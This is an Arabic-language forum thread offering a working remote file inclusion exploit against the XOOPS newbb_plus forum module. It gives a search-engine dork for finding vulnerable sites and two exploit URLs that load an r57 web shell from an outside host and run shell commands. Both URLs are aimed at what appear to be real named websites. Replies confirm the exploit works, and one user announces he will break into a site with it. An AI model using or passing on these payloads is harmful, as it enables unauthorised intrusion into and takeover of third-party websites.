السلام عليكم

لمعرفة المواقع المصابه بهذى الثغره اضغط هنا (http://www.google.com/search?q=inurl:/newbb_plus/&hl=ar&lr=&start=0&sa=N)

الثغره هذى لها استغلالين
والاستغلالين لتحميل شيل على الموقع المصاب

الاستغلال الاول

newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://rst.void.ru/download/r57shell.txt?

مثال
http://www.ieeesb.upatras.gr/modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://rst.void.ru/download/r57shell.txt?

الاستغلال الثانى

newbb_plus/class/forumpollrenderer.php?cmd=ls%20-la&xoopsConfig[language]=suntzu&bbPath[path]=http://rst.void.ru/download/r57shell.txt?

مثال
http://zubr-mogilev.org/modules/newbb_plus/class/forumpollrenderer.php?cmd=ls%20-la&xoopsConfig[language]=suntzu&bbPath[path]=http://rst.void.ru/download/r57shell.txt?

وعلى فكره الاثنين ينحطون بعد http://www.victim.com/modules/
فمان الله

يعطيك الف عافية أخوي Amc
والثغرة شغاله مزبوط والإستغلال واضح

مشكور وماقصرت اخي والله يعطيك العافيه يابعدحيي
وان شاء الله كل شيء مزبوط انا اجرب واحاول ان شاء الله بأذن الكريم اللي ماتنام عينه اني
راح اخترق لي موقع بواسطة هالثغرة ت حـ ي ااا تـي

يعطيك الف عافيه يا amc

وجاري التطبيق ...

وتسلم يالغالي .

الله يعافيكم

حياك الله ورده

الله يحيك ماكس